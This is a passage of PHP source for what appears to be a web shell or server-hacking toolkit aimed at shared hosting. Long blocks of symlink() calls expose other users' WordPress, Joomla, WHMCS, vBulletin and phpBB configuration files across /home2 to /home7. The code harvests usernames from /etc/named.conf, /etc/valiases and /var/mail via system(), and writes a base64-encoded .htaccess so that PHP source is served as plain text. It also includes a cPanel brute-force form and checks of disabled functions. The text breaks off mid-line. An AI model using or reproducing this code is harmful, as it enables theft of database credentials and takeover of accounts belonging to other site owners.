ation.php\',$pdomain.\'~~Joomla2.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/joomla/configuration.php\',$pdomain.\'~~Joomla3.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/whm/configuration.php\',$pdomain.\'~~Whm1.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/whmc/configuration.php\',$pdomain.\'~~Whm2.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/support/configuration.php\',$pdomain.\'~~Whm3.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/client/configuration.php\',$pdomain.\'~~Whm4.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/billings/configuration.php\',$pdomain.\'~~Whm5.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/billing/configuration.php\',$pdomain.\'~~Whm6.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/clients/configuration.php\',$pdomain.\'~~Whm7.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/whmcs/configuration.php\',$pdomain.\'~~Whm8.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/order/configuration.php\',$pdomain.\'~~Whm9.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/admin/conf.php\',$pdomain.\'~~5.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/admin/config.php\',$pdomain.\'~~4.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/conf_global.php\',$pdomain.\'~~invisio.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~7.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/connect.php\',$pdomain.\'~~8.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/mk_conf.php\',$pdomain.\'~~mk-portale1.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/include/config.php\',$pdomain.\'~~12.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/settings.php\',$pdomain.\'~~Smf.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/includes/functions.php\',$pdomain.\'~~phpbb3.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~infinity.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/vb/includes/config.php\',$pdomain.\'~~vBulletin1.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/includes/config.php\',$pdomain.\'~~vBulletin2.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~vBulletin3.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/cc/includes/config.php\',$pdomain.\'~~vBulletin4.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/config.php\',$pdomain.\'~~Phpbb1.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~Phpbb2.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/wp-config.php\',$pdomain.\'~~Wordpress1.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/blog/wp-config.php\',$pdomain.\'~~Wordpress2.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/configuration.php\',$pdomain.\'~~Joomla1.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/blog/configuration.php\',$pdomain.\'~~Joomla2.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/joomla/configuration.php\',$pdomain.\'~~Joomla3.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/whm/configuration.php\',$pdomain.\'~~Whm1.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/whmc/configuration.php\',$pdomain.\'~~Whm2.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/support/configuration.php\',$pdomain.\'~~Whm3.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/client/configuration.php\',$pdomain.\'~~Whm4.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/billings/configuration.php\',$pdomain.\'~~Whm5.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/billing/configuration.php\',$pdomain.\'~~Whm6.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/clients/configuration.php\',$pdomain.\'~~Whm7.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/whmcs/configuration.php\',$pdomain.\'~~Whm8.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/order/configuration.php\',$pdomain.\'~~Whm9.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/admin/conf.php\',$pdomain.\'~~5.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/admin/config.php\',$pdomain.\'~~4.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/conf_global.php\',$pdomain.\'~~invisio.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~7.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/connect.php\',$pdomain.\'~~8.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/mk_conf.php\',$pdomain.\'~~mk-portale1.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/include/config.php\',$pdomain.\'~~12.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/settings.php\',$pdomain.\'~~Smf.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/includes/functions.php\',$pdomain.\'~~phpbb3.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~infinity.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/vb/includes/config.php\',$pdomain.\'~~vBulletin1.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/includes/config.php\',$pdomain.\'~~vBulletin2.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~vBulletin3.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/cc/includes/config.php\',$pdomain.\'~~vBulletin4.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/config.php\',$pdomain.\'~~Phpbb1.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~Phpbb2.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/wp-config.php\',$pdomain.\'~~Wordpress1.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/blog/wp-config.php\',$pdomain.\'~~Wordpress2.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/configuration.php\',$pdomain.\'~~Joomla1.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/blog/configuration.php\',$pdomain.\'~~Joomla2.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/joomla/configuration.php\',$pdomain.\'~~Joomla3.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/whm/configuration.php\',$pdomain.\'~~Whm1.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/whmc/configuration.php\',$pdomain.\'~~Whm2.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/support/configuration.php\',$pdomain.\'~~Whm3.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/client/configuration.php\',$pdomain.\'~~Whm4.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/billings/configuration.php\',$pdomain.\'~~Whm5.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/billing/configuration.php\',$pdomain.\'~~Whm6.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/clients/configuration.php\',$pdomain.\'~~Whm7.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/whmcs/configuration.php\',$pdomain.\'~~Whm8.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/order/configuration.php\',$pdomain.\'~~Whm9.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/admin/conf.php\',$pdomain.\'~~5.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/admin/config.php\',$pdomain.\'~~4.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/conf_global.php\',$pdomain.\'~~invisio.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~7.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/connect.php\',$pdomain.\'~~8.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/mk_conf.php\',$pdomain.\'~~mk-portale1.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/include/config.php\',$pdomain.\'~~12.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/settings.php\',$pdomain.\'~~Smf.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/includes/functions.php\',$pdomain.\'~~phpbb3.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~infinity.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/vb/includes/config.php\',$pdomain.\'~~vBulletin1.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/includes/config.php\',$pdomain.\'~~vBulletin2.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~vBulletin3.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/cc/includes/config.php\',$pdomain.\'~~vBulletin4.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/config.php\',$pdomain.\'~~Phpbb1.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~Phpbb2.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/wp-config.php\',$pdomain.\'~~Wordpress1.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/blog/wp-config.php\',$pdomain.\'~~Wordpress2.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/configuration.php\',$pdomain.\'~~Joomla1.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/blog/configuration.php\',$pdomain.\'~~Joomla2.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/joomla/configuration.php\',$pdomain.\'~~Joomla3.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/whm/configuration.php\',$pdomain.\'~~Whm1.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/whmc/configuration.php\',$pdomain.\'~~Whm2.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/support/configuration.php\',$pdomain.\'~~Whm3.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/client/configuration.php\',$pdomain.\'~~Whm4.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/billings/configuration.php\',$pdomain.\'~~Whm5.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/billing/configuration.php\',$pdomain.\'~~Whm6.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/clients/configuration.php\',$pdomain.\'~~Whm7.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/whmcs/configuration.php\',$pdomain.\'~~Whm8.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/order/configuration.php\',$pdomain.\'~~Whm9.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/admin/conf.php\',$pdomain.\'~~5.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/admin/config.php\',$pdomain.\'~~4.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/conf_global.php\',$pdomain.\'~~invisio.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~7.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/connect.php\',$pdomain.\'~~8.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/mk_conf.php\',$pdomain.\'~~mk-portale1.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/include/config.php\',$pdomain.\'~~12.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/settings.php\',$pdomain.\'~~Smf.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/includes/functions.php\',$pdomain.\'~~phpbb3.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~infinity.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/vb/includes/config.php\',$pdomain.\'~~vBulletin1.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/includes/config.php\',$pdomain.\'~~vBulletin2.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~vBulletin3.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/cc/includes/config.php\',$pdomain.\'~~vBulletin4.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/config.php\',$pdomain.\'~~Phpbb1.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~Phpbb2.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/wp-config.php\',$pdomain.\'~~Wordpress1.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/blog/wp-config.php\',$pdomain.\'~~Wordpress2.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/configuration.php\',$pdomain.\'~~Joomla1.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/blog/configuration.php\',$pdomain.\'~~Joomla2.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/joomla/configuration.php\',$pdomain.\'~~Joomla3.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/whm/configuration.php\',$pdomain.\'~~Whm1.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/whmc/configuration.php\',$pdomain.\'~~Whm2.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/support/configuration.php\',$pdomain.\'~~Whm3.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/client/configuration.php\',$pdomain.\'~~Whm4.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/billings/configuration.php\',$pdomain.\'~~Whm5.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/billing/configuration.php\',$pdomain.\'~~Whm6.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/clients/configuration.php\',$pdomain.\'~~Whm7.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/whmcs/configuration.php\',$pdomain.\'~~Whm8.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/order/configuration.php\',$pdomain.\'~~Whm9.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/admin/conf.php\',$pdomain.\'~~5.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/admin/config.php\',$pdomain.\'~~4.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/conf_global.php\',$pdomain.\'~~invisio.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~7.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/connect.php\',$pdomain.\'~~8.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/mk_conf.php\',$pdomain.\'~~mk-portale1.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/include/config.php\',$pdomain.\'~~12.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/settings.php\',$pdomain.\'~~Smf.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/includes/functions.php\',$pdomain.\'~~phpbb3.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~infinity.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/vb/includes/config.php\',$pdomain.\'~~vBulletin1.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/includes/config.php\',$pdomain.\'~~vBulletin2.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~vBulletin3.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/cc/includes/config.php\',$pdomain.\'~~vBulletin4.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/config.php\',$pdomain.\'~~Phpbb1.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~Phpbb2.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/wp-config.php\',$pdomain.\'~~Wordpress1.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/blog/wp-config.php\',$pdomain.\'~~Wordpress2.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/configuration.php\',$pdomain.\'~~Joomla1.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/blog/configuration.php\',$pdomain.\'~~Joomla2.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/joomla/configuration.php\',$pdomain.\'~~Joomla3.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/whm/configuration.php\',$pdomain.\'~~Whm1.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/whmc/configuration.php\',$pdomain.\'~~Whm2.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/support/configuration.php\',$pdomain.\'~~Whm3.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/client/configuration.php\',$pdomain.\'~~Whm4.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/billings/configuration.php\',$pdomain.\'~~Whm5.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/billing/configuration.php\',$pdomain.\'~~Whm6.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/clients/configuration.php\',$pdomain.\'~~Whm7.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/whmcs/configuration.php\',$pdomain.\'~~Whm8.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/order/configuration.php\',$pdomain.\'~~Whm9.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/admin/conf.php\',$pdomain.\'~~5.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/admin/config.php\',$pdomain.\'~~4.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/conf_global.php\',$pdomain.\'~~invisio.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~7.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/connect.php\',$pdomain.\'~~8.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/mk_conf.php\',$pdomain.\'~~mk-portale1.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/include/config.php\',$pdomain.\'~~12.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/settings.php\',$pdomain.\'~~Smf.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/includes/functions.php\',$pdomain.\'~~phpbb3.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~infinity.txt\');\r\n\t}\r\n\r\n\t\t\t\t$d0mains = @file("/etc/named.conf");\r\n\t\t\r\n\t\t\t\tif($d0mains)\r\n\t\t\t\t{\r\n\t\t\t\t\tmkdir($fn);\r\n\t\t\t\t\tchdir($fn);\r\n\t\t\t\t\t\t\t\t\t\t\r\n\t\t\t\t\tforeach($d0mains as $d0main)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tif(eregi("zone",$d0main))\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tpreg_match_all(\'#zone "(.*)"#\', $d0main, $domains);\r\n\t\t\t\t\t\t\tflush();\r\n\t\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\tif(strlen(trim($domains[1][0])) > 2)\r\n\t\t\t\t\t\t\t{ \r\n\t\t\t\t\t\t\t\t$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));\r\n\t\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\t\tsyml($user[\'name\'],$domains[1][0]);\t\t\t\t\t\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t\techo "<center><font color=lime size=3>[ Done ]</font></center>";\r\n\t\t\t\t\techo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>"; \r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\tmkdir($fn);\r\n\t\t\t\t\tchdir($fn);\r\n\t\t\t\t\t$temp = "";\r\n\t\t\t\t\t$val1 = 0;\r\n\t\t\t\t\t$val2 = 1000;\r\n\t\t\t\t\tfor(;$val1 <= $val2;$val1++) \r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t$uid = @posix_getpwuid($val1);\r\n\t\t\t\t\t\tif ($uid)\r\n\t\t\t\t\t\t\t$temp .= join(\':\',$uid)."\\n";\r\n\t\t\t\t\t }\r\n\t\t\t\t\t echo \'<br/>\';\r\n\t\t\t\t\t $temp = trim($temp);\r\n\t\t\t\t\t \r\n\t\t\t\t\t $file5 = fopen("test.txt","w");\r\n\t\t\t\t\t fputs($file5,$temp);\r\n\t\t\t\t\t fclose($file5);\r\n\r\n$htaccess =\r\n\'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh\r\naW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp\r\nbiAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk=\r\n\';\r\n$file = fopen(".htaccess","w+");\r\n$write = fwrite ($file ,base64_decode($htaccess));\r\n\t\t\t\t\t \r\n\t\t\t\t\t $file = fopen("test.txt", "r") or exit("Unable to open file!");\r\n\t\t\t\t\t while(!feof($file))\r\n\t\t\t\t\t {\r\n\t\t\t\t\t\t$s = fgets($file);\r\n\t\t\t\t\t\t$matches = array();\r\n\t\t\t\t\t\t$t = preg_match(\'/\\/(.*?)\\:\\//s\', $s, $matches);\r\n\t\t\t\t\t\t$matches = str_replace("home/","",$matches[1]);\r\n\t\t\t\t\t\tif(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")\r\n\t\t\t\t\t\t\tcontinue;\r\n\t\t\t\t\t\tsyml($matches,$matches);\r\n\t\t\t\t\t }\r\n\t\t\t\t\tfclose($file);\r\n\t\t\t\t\techo "</table>";\r\n\t\t\t\t\tunlink("test.txt");\r\n\t\t\t\t\techo "<center><font color=lime size=3>[ Done ]</font></center>";\r\n\t\t\t\t\techo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>"; \r\n\t\t\t\t}\r\necho "<hr><center><b><a href=".$_SERVER[\'PHP_SELF\'].">BACK</a>";\r\nexit;\r\n}\r\n?>\r\n<form method="POST" target="_blank">\r\n\t<strong>\r\n<input name="page" type="hidden" value="find"><table>      \t\t\t\t\r\n    </strong><br><br><center><font size="5" style="italic" color="#00ff00">=[ Cpanel BruteForce ]=</font></center><br><br>\r\n    <table width="600" border="0" cellpadding="3" cellspacing="1" align="center">\r\n\t<tr>\r\n\t<td valign="top" bgcolor="#151515" class="style2" style="width: 139px">\r\n\t<center><b><font size="5" style="italic" color="#00ff00">Cpanel BruteForce</font></b></center></td></tr>\r\n    <tr>\r\n    <td>\r\n    <table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">\r\n    <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">\r\n\t<strong>User :</strong></td>\r\n    <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class =\'inputz\' rows="10" name="usernames"><?php system(\'ls /var/mail\');?></textarea></strong></td>\r\n    </tr>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">\r\n\t<strong>Pass :</strong></td>\r\n    <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class =\'inputz\' rows="10" name="passwords"></textarea></strong></td>\r\n    </tr>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">\r\n\t<strong>Type :</strong></td>\r\n    <td valign="top" bgcolor="#151515" colspan="5">\r\n    <span class="style2"><strong>Simple : </strong> </span>\r\n\t<strong>\r\n\t<input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>\r\n    <font class="style2"><strong>/etc/passwd : </strong> </font>\r\n\t<strong>\r\n\t<input type="radio" name="type" value="passwd" class="style3"></strong><span class="style3"><strong>\r\n\t</strong>\r\n\t</span>\r\n    </td>\r\n    </tr>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" style="width: 139px"></td>\r\n    <td valign="top" bgcolor="#151515"  colspan="5"><strong><input class =\'inputzbut\' type="submit" value="start">\r\n    </strong>\r\n    </td>\r\n    <tr>\r\n</form> \r\n<tr>\r\n    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Get Config :</strong></td>\r\n    \t\t\t\t</tr>\r\n<form method="POST" target="_blank">\r\n\t<strong>\r\n<input name="mendapatkan" type="hidden" value="passwd">        \t\t\t\t\r\n    </strong>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Folder Name :</strong></td>\r\n    <td valign="top" bgcolor="#151515"><strong><input class =\'inputz\' size="35" name="foldername" type="text"></strong></td>\r\n\t</strong>\r\n    </td>\r\n    </tr>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" style="width: 139px"></td>\r\n    <td valign="top" bgcolor="#151515" colspan="5"><strong><input class =\'inputzbut\' type="submit" value="GO">\r\n    </strong>\r\n    </td>\r\n    <tr>\r\n</form>   \r\n<tr>\r\n    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Get Wordlist</strong></td>\r\n    \t\t\t\t</tr>\r\n<form method="POST" target="_blank">\r\n\t<strong>\r\n<input name="pass" type="hidden" value="password">        \t\t\t\t\r\n    </strong>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Url Config :</strong></td>\r\n    <td valign="top" bgcolor="#151515"><strong><input class =\'inputz\' size="35" name="url" type="text"></strong></td>\r\n\t</strong>\r\n    </td>\r\n    </tr>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" style="width: 139px"></td>\r\n    <td valign="top" bgcolor="#151515" colspan="5"><strong><input class =\'inputzbut\' type="submit" value="GO">\r\n    </strong>\r\n    </td>\r\n    <tr>\r\n</form>\r\n<tr>\r\n    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Info \r\n\tSecurity</strong></td>\r\n    \t\t\t\t</tr>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Safe Mode</strong></td>\r\n    <td valign="top" bgcolor="#151515" colspan="5">\r\n\t<strong>\r\n<?php\r\n$safe_mode = ini_get(\'safe_mode\');\r\nif($safe_mode==\'1\')\r\n{\r\necho \'ON\';\r\n}else{\r\necho \'OFF\';\r\n}\r\n\r\n?>\t\r\n\t</strong>\t\r\n\t</td>\r\n    \t\t\t\t</tr>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Desible Function</strong></td>\r\n    <td valign="top" bgcolor="#151515" colspan="5">\r\n\t<strong>\r\n<form method="POST" target="_blank">\r\n\t<strong>\r\n<input name="matikan" type="hidden" value="sekatan">        \t\t\t\t\r\n    </strong>\r\n\r\n<?php\r\nif(\'\'==($func=@ini_get(\'disable_functions\')))\r\n{\r\necho "<font color=#00ff00>No Security for Function</font></b>";\r\n}else{\r\necho \'<script>alert("Please see below and press >Please Click Here First!<");</script>\';\r\necho "<font color=red>$func</font></b>";\r\necho \'<tr><td valign="top" bgcolor="#151515" style="width: 